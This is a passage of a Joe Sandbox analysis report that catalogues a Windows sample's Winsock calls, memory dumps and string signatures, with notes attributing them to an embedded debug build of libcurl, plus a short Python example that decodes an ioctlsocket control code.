                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0020935D (control code 4004747B = SIO_IDEAL_SEND_BACKLOG_QUERY, no input buffer, 4-byte output: queries the ideal send backlog of the connection)
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00209388 (level 0000FFFF = SOL_SOCKET, optname 00001001 = SO_SNDBUF, 4-byte value: adjusts the send buffer from the queried value)
                                Note: the strings "Send failure: %s" and "send(len=%zu) -> %d, err=%d" with cf-socket.c place this in libcurl's lib/cf-socket.c as well.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Ioctlsetsockopt
                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                • API String ID: 1903391676-2691795271
                                • Opcode ID: 0a8e2467e081c0c8c752ad5ece583377bc2cb07be53c93ab4c2c98f19c987b89
                                • Instruction ID: 64b2cb0299bfe0ff95c35f71b6c0b79cd62d6c4c9ff5fe70c0115ef5c420a075
                                • Opcode Fuzzy Hash: 0a8e2467e081c0c8c752ad5ece583377bc2cb07be53c93ab4c2c98f19c987b89
                                • Instruction Fuzzy Hash: FF51C170604305ABDB10DF24C881FAAB7A5FF88314F148569FD489B2C3E770E9A1CB91

                                Control-flow Graph

                                control_flow_graph: function at 1d76a0 (basic blocks 1d76a0-1d7762). Edge list of the rendered graph omitted. A short wrapper: send at 1d76e6, with a logging path (call 1d72a0) on both the success and the memory-limit branches.
                                APIs
                                • send.WS2_32(multi.c,?,?,?,001D3D4E,00000000,?,?,001E07BF), ref: 001D76EB
                                Note: the format strings "SEND %s:%d send(%lu) = %ld" and "LIMIT %s:%d %s reached memlimit" (and "FD %s:%d socket() = %d" in the next function) are the trace formats of libcurl's memory-debug wrappers in lib/memdebug.c (curl_dbg_send, curl_dbg_socket). Those wrappers take the caller's source file and line as extra arguments and are compiled only in CURLDEBUG builds, so the sample carries a debug build of libcurl.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: send
                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                • API String ID: 2809346765-3388739168
                                • Opcode ID: 6ac0776d7e3abac552222f42553bf97434b5a73d7030d834f7b171ad111c2865
                                • Instruction ID: 1d2227a1731696669aad019e8798305c4170685912f3aa27a154c64043aa6639
                                • Opcode Fuzzy Hash: 6ac0776d7e3abac552222f42553bf97434b5a73d7030d834f7b171ad111c2865
                                • Instruction Fuzzy Hash: 18115CF161CB457BE514A7189C8AD277B6CEBC1B68F450D1AFC08A3381F3619C04C6B1

                                Control-flow Graph

                                control_flow_graph: function at 1d75e0 (basic blocks 1d75e0-1d7699). Edge list of the rendered graph omitted. A wrapper around socket at 1d7607 with the same logging path (call 1d72a0) as the send wrapper above; the report lists no resolved API arguments for this function.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: socket
                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                • API String ID: 98920635-842387772
                                • Opcode ID: 5db78509a91ef929fcc2d1a322ae9d0df067964e06a7fa8ee9839d00f8b55b00
                                • Instruction ID: 6e9d7bdbb0cc2330084eb92ece0dce1b4f0f07f3577762e0d775ee39dcc4665e
                                • Opcode Fuzzy Hash: 5db78509a91ef929fcc2d1a322ae9d0df067964e06a7fa8ee9839d00f8b55b00
                                • Instruction Fuzzy Hash: 03114CB1A04B5227DA11677C6C47F9B3B54EF81764F044926F814963D2F361CC64C6E1

                                Control-flow Graph

                                control_flow_graph: function at 20a150 (basic blocks 20a150-20a250). Edge list of the rendered graph omitted. getsockname at 20a181, then either the failure message path or a call to 20ef30 (address-to-text conversion, judging by the inet_ntop error string) with its own failure path.
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0020A1C6 (namelen 00000080 = 128 = sizeof(SOCKADDR_STORAGE), large enough for IPv4 and IPv6)
                                Note: "getsockname() failed with errno %d: %s" and "ssloc inet_ntop() failed with errno %d: %s" are the local-address lookup messages of libcurl's lib/cf-socket.c.
                                Strings
                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0020A23B
                                • getsockname() failed with errno %d: %s, xrefs: 0020A1F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                • API String ID: 3358416759-2605427207
                                • Opcode ID: 2227ca180b5b6a0078211408aa62e62939db2ff6ba4000cbd1b6c758556681d7
                                • Instruction ID: b04ff16409f648d14508f77ada2467edf83ea011cd0ddc2ac7841f86fe4009e8
                                • Opcode Fuzzy Hash: 2227ca180b5b6a0078211408aa62e62939db2ff6ba4000cbd1b6c758556681d7
                                • Instruction Fuzzy Hash: D121F871858780AAF7259B28DC46FE773BCEF91324F040614F98853192FB32599987E2

                                Control-flow Graph (rendered graph omitted; basic blocks 1ed5e0-1ed68d, with a call to WSAStartup)
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 001ED65B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Startup
                                • String ID: if_nametoindex$iphlpapi.dll
                                • API String ID: 724789610-3097795196
                                • Opcode ID: 098262808002dbd50f3c9fa1b826ed13c267a83f4167fd03d5f758d21d154931
                                • Instruction ID: e264a8f1ad8b9fcb39b3b87c2f8b3e3dfdff3cc9e7099282c1bcacd9ebd24da1
                                • Opcode Fuzzy Hash: 098262808002dbd50f3c9fa1b826ed13c267a83f4167fd03d5f758d21d154931
                                • Instruction Fuzzy Hash: 6E0126E0944F8516FB11BB38AD1B76A35E06F65304F891868EC5CD31E2FB7CC988C252

                                Control-flow Graph (rendered graph omitted; basic blocks 29aa30-29af1f, with calls to socket, ioctlsocket and connect)
                                APIs
                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0029AB9B
                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0029ABE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: ioctlsocketsocket
                                • String ID:
                                • API String ID: 416004797-0
                                • Opcode ID: 4ea77de4788ea6441d95f94b603c89c666eeec8ed27bceb8ee5b4f3d7ecc6a2f
                                • Instruction ID: c772db7ba9902d961ccb57481ca31b6b5f78567cbb3f2a2f7d87c37a7d8be1b8
                                • Opcode Fuzzy Hash: 4ea77de4788ea6441d95f94b603c89c666eeec8ed27bceb8ee5b4f3d7ecc6a2f
                                • Instruction Fuzzy Hash: 78E1E1706243029BEF20CF24C885B6BB7E5FF89304F144A2DF9998B291D775D864CB92
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID: FD %s:%d sclose(%d)
                                • API String ID: 2781271927-3116021458
                                • Opcode ID: 02de85c873a9fe6ce08d2eba429a9f83ccf3007be5f77925e9171deb7cf63cac
                                • Instruction ID: c5be1dd0c8508e4c05990c2938fcf78feef3cb9e2abb37ffbdb6e3d06a63f7c6
                                • Opcode Fuzzy Hash: 02de85c873a9fe6ce08d2eba429a9f83ccf3007be5f77925e9171deb7cf63cac
                                • Instruction Fuzzy Hash: 11D05E32A092216B8920655D6D49C4B6AA8DECAF60B46485AF948A7344E2209C0087E2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID: ]kw
                                • API String ID: 2962429428-3545051650
                                • Opcode ID: 6ab183cddbeea1f16001310119fa1faf1b5dd8a8d682a64ea1e3f1c30d506c56
                                • Instruction ID: ec80ca0c8ed48cfb30600b385bd784a0e3414db1f9a88e58f5380d30a670d9aa
                                • Opcode Fuzzy Hash: 6ab183cddbeea1f16001310119fa1faf1b5dd8a8d682a64ea1e3f1c30d506c56
                                • Instruction Fuzzy Hash: 3F3193B49057059BCB40FFB8D58569EBBF4BF44344F00896EE898A7341E7349A44CF92
                                APIs
                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0029B29E,?,00000000,?,?), ref: 0029B0B9
                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00283C41,00000000), ref: 0029B0C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: ErrorLastconnect
                                • String ID:
                                • API String ID: 374722065-0
                                • Opcode ID: 2fff33d58e9749efdb0666e84b070a41d3077d6a6b5f47bdd906810406db7e18
                                • Instruction ID: 8472901261978d05bd9102befab048eba5512724d740814650b3a78ede115d09
                                • Opcode Fuzzy Hash: 2fff33d58e9749efdb0666e84b070a41d3077d6a6b5f47bdd906810406db7e18
                                • Instruction Fuzzy Hash: 3F01D8322142015BCE215E69AD44F6BB399FF89764F040728F978931D1E726DD608751
                                APIs
                                • gethostname.WS2_32(00000000,00000040), ref: 00284AA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: gethostname
                                • String ID:
                                • API String ID: 144339138-0
                                • Opcode ID: 0f342616da04757bdea7282be3c95c4d0754758ed505a7f7f2ffc2a01f8f4cd1
                                • Instruction ID: 6c46474c6c981632b8f3e0e50ba12d31ad15c92fc3c0d4a3437afe77c0e791c6
                                • Opcode Fuzzy Hash: 0f342616da04757bdea7282be3c95c4d0754758ed505a7f7f2ffc2a01f8f4cd1
                                • Instruction Fuzzy Hash: 715106789227038BEB30BF25DD4972376D4AF00319F14093DE98A876D1E7B4E864CB02
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0029AFD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID:
                                • API String ID: 3358416759-0
                                • Opcode ID: 4b96f7929bb1acc700bd659a4f8ceee5e4348de9f60115ac2493194ccd67a1c1
                                • Instruction ID: 9e44515baec107eef6dc1f210de59744a1749b86d36c95471ce3cdd7a0298048
                                • Opcode Fuzzy Hash: 4b96f7929bb1acc700bd659a4f8ceee5e4348de9f60115ac2493194ccd67a1c1
                                • Instruction Fuzzy Hash: 32119670818785D6EB268F1CD4027F6B3F4EFD0329F109618E59942550F7725AD58BC2
                                APIs
                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0029A97F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: 7a65d30e3c8c9f9254f53e0d7eba944957a6687a4eb65467acc91e39084358ea
                                • Instruction ID: 2520a3c0ebcf9354318b35b33e6facb9976235d0d3a288bfff8af0226ef564cd
                                • Opcode Fuzzy Hash: 7a65d30e3c8c9f9254f53e0d7eba944957a6687a4eb65467acc91e39084358ea
                                • Instruction Fuzzy Hash: 5901A2B2B10711AFD7148F19DC85B56B7A5FF84720F068659EA982B361C331AC108BE1
                                APIs
                                • socket.WS2_32(?,0029B280,00000000,-00000001,00000000,0029B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0029AF67
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: socket
                                • String ID:
                                • API String ID: 98920635-0
                                • Opcode ID: 9162f9816ee714db1343477e4ce2821aabd7b44b633be09583d57540512d47cc
                                • Instruction ID: 01785105766a99d3dc459d0d8af9d6180c89b199cf2ebff4da5983c9f31e6a38
                                • Opcode Fuzzy Hash: 9162f9816ee714db1343477e4ce2821aabd7b44b633be09583d57540512d47cc
                                • Instruction Fuzzy Hash: CEE0EDB6A193266BDA54DE1CE8449ABF369EFC4B20F055A49B85467204C330AC548BE2
                                APIs
                                • closesocket.WS2_32(?,00299422,?,?,?,?,?,?,?,?,?,?,?,w3(,00691280,00000000), ref: 0029B04D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: c99d020bc1ca4abacd35d858171d7e9a801238dc56b029140c3d424904b72faf
                                • Instruction ID: 8ccdcae0318aa3bf5fa8a9a4f1a4c71783f09a447bd8c55c1af2ca2ff19f7f96
                                • Opcode Fuzzy Hash: c99d020bc1ca4abacd35d858171d7e9a801238dc56b029140c3d424904b72faf
                                • Instruction Fuzzy Hash: 32D0C23430020257CE208E14D984A57722B7FC0310FA8CB68E02C4A150D73BCC538601
                                APIs
                                • ioctlsocket.WS2_32(?,8004667E,?,?,0020AF56,?,00000001), ref: 002367FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: ioctlsocket
                                • String ID:
                                • API String ID: 3577187118-0
                                • Opcode ID: 2f0cf5caecdf6c396824a47682fd04f3aef45e805fd034ad942242e359869970
                                • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                • Opcode Fuzzy Hash: 2f0cf5caecdf6c396824a47682fd04f3aef45e805fd034ad942242e359869970
                                • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
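The ioctlsocket() call above passes 8004667E as its cmd argument. The following Python is a worked example added to this report (it is neither Joe Sandbox output nor code from the sample): it rebuilds the control-code bit layout that the _IO/_IOR/_IOW macros in <winsock2.h> use (IOC_IN = 0x80000000, IOC_OUT = 0x40000000, IOC_VOID = 0x20000000, IOCPARM_MASK = 0x7f) and parses the report's "api.Module(args), ref: addr" line shape so the constant can be named. 8004667E decodes to FIONBIO, the request that switches a socket to non-blocking mode, which is what a client that drives connect() under select()/poll() timeouts normally does before connecting. The parser and the function names are mine, not the report's.

```python
"""Decode the control code passed to ioctlsocket() in a Joe Sandbox API trace line.

Added example; not part of the report and not code from the analysed sample.
Rebuilds the _IO/_IOR/_IOW macro layout from <winsock2.h> and parses the
report's "api.Module(args), ref: addr" line format.
"""
import re

IOC_VOID = 0x20000000
IOC_OUT = 0x40000000
IOC_IN = 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT
IOCPARM_MASK = 0x7F


def make_ioctl(direction, group, number, size=0):
    """Same bit layout as _IO/_IOR/_IOW: dir | (size << 16) | (group << 8) | number."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


# Standard Winsock control codes; all take a u_long (4-byte) argument.
KNOWN_CODES = {
    make_ioctl(IOC_IN, "f", 126, 4): "FIONBIO",    # set/clear non-blocking mode
    make_ioctl(IOC_OUT, "f", 127, 4): "FIONREAD",  # bytes available to read
    make_ioctl(IOC_IN, "f", 125, 4): "FIOASYNC",   # set/clear async I/O
    make_ioctl(IOC_IN, "s", 0, 4): "SIOCSHIWAT",
    make_ioctl(IOC_OUT, "s", 1, 4): "SIOCGHIWAT",
    make_ioctl(IOC_IN, "s", 2, 4): "SIOCSLOWAT",
    make_ioctl(IOC_OUT, "s", 3, 4): "SIOCGLOWAT",
    make_ioctl(IOC_OUT, "s", 7, 4): "SIOCATMARK",
}


def decode_ioctl(code):
    """Split a 32-bit Winsock control code into its fields and name it if known."""
    direction = {IOC_IN: "in", IOC_OUT: "out", IOC_INOUT: "inout",
                 IOC_VOID: "void"}.get(code & 0xE0000000, "unknown")
    return {
        "code": code,
        "direction": direction,
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
        "name": KNOWN_CODES.get(code),
    }


# Report line shape: "<api>.<module>(<args>), ref: <call-site address>".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_line(line):
    """Return api name, module, the argument list as printed, and the call-site address."""
    m = API_LINE.match(line)
    if not m:
        raise ValueError("not a Joe Sandbox API line: %r" % line)
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in m.group("args").split(",")],
        "ref": int(m.group("ref"), 16),
    }


def explain_ioctlsocket(line):
    """Decode the cmd argument (second parameter) of an ioctlsocket() trace line."""
    call = parse_api_line(line)
    if call["api"] != "ioctlsocket":
        raise ValueError("expected ioctlsocket, got %s" % call["api"])
    return decode_ioctl(int(call["args"][1], 16))


# Trace line copied from the report entry above.
REPORT_LINE = "• ioctlsocket.WS2_32(?,8004667E,?,?,0020AF56,?,00000001), ref: 002367FC"

if __name__ == "__main__":
    info = explain_ioctlsocket(REPORT_LINE)
    print("cmd=0x%08X -> %s (%s, %d-byte arg, group %r, number %d)" % (
        info["code"], info["name"], info["direction"], info["size"],
        info["group"], info["number"]))
```

parse_api_line() also accepts the send, socket and closesocket lines above; only the question marks and stack leftovers such as "w3(" in the argument list mean the positional arguments cannot always be trusted beyond the ones the tracer resolved.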

                                Non-executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                • API String ID: 0-122532811
                                • Opcode ID: c98f7207541738f2f0ca31e8b36b7b0bca1fdea24d62be9d318dcf9cc4790a7c
                                • Instruction ID: 0b31ee4b5903a45e8230c32ca62c68e17db8dcc07ca39b0ce2825e96123166a9
                                • Opcode Fuzzy Hash: c98f7207541738f2f0ca31e8b36b7b0bca1fdea24d62be9d318dcf9cc4790a7c
                                • Instruction Fuzzy Hash: 80422771B08B01AFD718DE28CC51B6BB6E6FBD8704F048A2DF54D97391E735A8048B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 0-2555271450
                                • Opcode ID: 358bbff41a1a6cee5596f1eea5b598897f56869974740e3af67658a01fbcce9a
                                • Instruction ID: 1fb1a982bb56ab1c284756c12bd95abba3fb1c7e30b1c14bd95a6b1f4f717a66
                                • Opcode Fuzzy Hash: 358bbff41a1a6cee5596f1eea5b598897f56869974740e3af67658a01fbcce9a
                                • Instruction Fuzzy Hash: 94C27D31608741DFC718CF28C4D066AB7E2BFC9354F168A2EE89A9B355D734ED458B82
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 0-2555271450
                                • Opcode ID: f42d8302a45eaccfd26ed4d0b65ff18ca3bf78bfecf8d4473ffeafd291ffcd86
                                • Instruction ID: e6d94f914995c6394f976c870c6952fb35990de0ae0b37839b0b661304152411
                                • Opcode Fuzzy Hash: f42d8302a45eaccfd26ed4d0b65ff18ca3bf78bfecf8d4473ffeafd291ffcd86
                                • Instruction Fuzzy Hash: 9182A271A083019FD714DE18C88572BBBE1AFC5325F198A2EF89A9B391D730DD46CB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: default$login$macdef$machine$netrc.c$password
                                • API String ID: 0-1043775505
                                • Opcode ID: 9dc25e82762ef52536bc79ca4d841bc0d04d8a05ffdc9f1b85402e8b28c68cc8
                                • Instruction ID: 751d2ddef8ac9bafe2fce13f7bdd3df6b6343e740fdaacb983998b1bc1567a55
                                • Opcode Fuzzy Hash: 9dc25e82762ef52536bc79ca4d841bc0d04d8a05ffdc9f1b85402e8b28c68cc8
                                • Instruction Fuzzy Hash: 53E12BF0568382BBE3109F10D84976FBBDCAF55748F54842CF88557281E3B9D968CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                • API String ID: 0-4201740241
                                • Opcode ID: 68dabbe02c1010919581fc7fcd38d14a03af06b8673c1f22aa08e0291cf59cab
                                • Instruction ID: 3e6dc292b46d2ff1aabca78f30b8f8c4eb192a18bece5985d51ad6366dfede00
                                • Opcode Fuzzy Hash: 68dabbe02c1010919581fc7fcd38d14a03af06b8673c1f22aa08e0291cf59cab
                                • Instruction Fuzzy Hash: 9D62D2B09247429BD715CF20C4907AAB7F4FF98304F04962DE98D8B352E774EA94CB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                 • Associated: same 16 memory dumps as listed under the socket.WS2_32 entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: $d$nil)
                                • API String ID: 0-394766432
                                • Opcode ID: cc4d0b58ce18ea7889aed264103b675084a2dbb05abfacb09a42251ecf940363
                                • Instruction ID: d80bc8f52f124151d8e97b15a10072979f1acfee2ed3760f283b777715827d49
                                • Opcode Fuzzy Hash: cc4d0b58ce18ea7889aed264103b675084a2dbb05abfacb09a42251ecf940363
                                • Instruction Fuzzy Hash: E6137A706087418FC724CF28C0A562ABFE1BFC9355F24492EE9959B3A1D771ED49CB82
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                • API String ID: 0-3285806060
                                • Opcode ID: 80d659766e50a5da846573cb142e36692963f02ccdba6a92d789754dd77a3fd5
                                • Instruction ID: a230f466a6faf42d7fa690e80cbe7416b05fd98798b4faefafa8b38fcf0d8373
                                • Opcode Fuzzy Hash: 80d659766e50a5da846573cb142e36692963f02ccdba6a92d789754dd77a3fd5
                                • Instruction Fuzzy Hash: 01D12A7AA293028BD724FE28D84137A7BD1AF91304F24893DF8D9972C1DB749C64D762
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: H$xn--
                                • API String ID: 0-4022323365
                                • Opcode ID: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                • Instruction ID: d63fa08c24539bd69dfa489268efc63ef25ae54a807fdc879e8a0d9161f3bb41
                                • Opcode Fuzzy Hash: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                • Instruction Fuzzy Hash: 2EE12B316087154BD718DE28D8E072ABBE2BBC4319F188A3EDD9687385D774DC898F42
                                Strings
                                Memory Dump Source
